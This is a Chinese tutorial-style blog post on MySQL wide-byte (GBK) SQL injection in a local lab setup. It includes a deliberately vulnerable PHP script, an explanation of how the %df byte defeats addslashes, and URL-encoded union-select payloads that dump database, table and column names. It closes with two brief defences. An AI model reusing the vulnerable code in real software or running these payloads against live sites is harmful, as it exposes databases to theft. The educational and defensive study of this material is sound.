mysql sql宽字节注入_sql注入之宽字节注入

宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码

不过既然是sql注入的一部分,也搭建环境  做做实验

实验环境:

wamp集成包

实验说明:

创建使用GBK编码的数据库

实验步骤:

使用phpmyadmin进行创建数据库的时候,如果不去选择编码格式,默认会使用latin1_swedish_ci 格式

查了一下 ,和GBK类似,那就这个吧。。。

使用默认编码,创建数据库后继续创建表格

4fe931da9550

latin1_swedish_ci

这里需要注意的是,使用latin1_swedish_ci 格式进行创建表,插入数据时

当插入汉字的时候,提示编码问题

难怪现在的大多网站都使用utf-8编码

4fe931da9550

格式问题

修改字段的编码格式   可插入汉字

继续编写php漏洞代码<?php

header("Content-type:text/html;charset=utf-8");

$id=@$_GET['id'];

if(isset($id)&&!empty($id)){

$id = addslashes($_GET['id']);//进行转义

$conn=mysql_connect('localhost','root','')  or  die  ("false");

mysql_select_db("tests",$conn);

mysql_query("set names 'gbk' ",$conn);//指明数据库gbk处理,不安全的编码格式

$sql = "select * from test where id='".$id."'";

$result = mysql_query($sql, $conn);

while ($row=@mysql_fetch_array($result)){

echo "用户名:".$row['name']."


";

//echo "密码:".$row['password']."";

}

mysql_close($conn);

print_r('执行SQL语句:'.$sql);

}else{

echo  "id  错误";

}

?>

进行访问   注入   测试

4fe931da9550

addslashes的转义

发现已经被转义了,使用%df  ' 进行注入

4fe931da9550

继续注入   %df%27 union select  1,2,3   #

注意URL编码问题

4fe931da9550

注入成功

以下为URL编码:

%27---------单引号

%20----------空格

%23-----------#号

%5c------------/反斜杠

为什么可以注入成功?

修改一下   header  改为gbkheader("Content-type:text/html;charset=gbk");

再次查看

4fe931da9550

反斜杠神奇消失

为什么反斜杠变成  運  这个玩意啦?

id=1'---------->id=1\'--------->id=1%5c%27

id=1%df'---------id=1%df%5c%27---------->id=1%DF5C%27-------->id=1運'

其实就是利用gbk是多字节的编码,两个字节代表一个汉字

%df    %5c   组合出了一个  運 字

因此  可以注入

4fe931da9550

success

扩展:

爆出所有的数据库名

payload:

id=%df%27%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%206,5%20%23

4fe931da9550

数据库名

爆出数据库中的数据表

payload:

id=%df%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,61%20%23

dvwa的十六进制编码为0x64767761

4fe931da9550

所有数据表

爆出指定数据库的字段

payload:

id=%df%27%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_schema=0x64767761%20and%20table_name=0x61646D696E%20limit%200,61%20%23

4fe931da9550

爆出字段

注意使用十六进制

table_schema=0x64767761(dvwa)  and  table_name=0x61646D696E(admin)

根据以上信息,可进行mysql的跨库查询,查询任意数据库的任意信息

4fe931da9550

可查询信息

防御:

1.使用mysql_set_charset(utf8)指定字符集

2. 使用mysql_real_escape_string进行转义

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值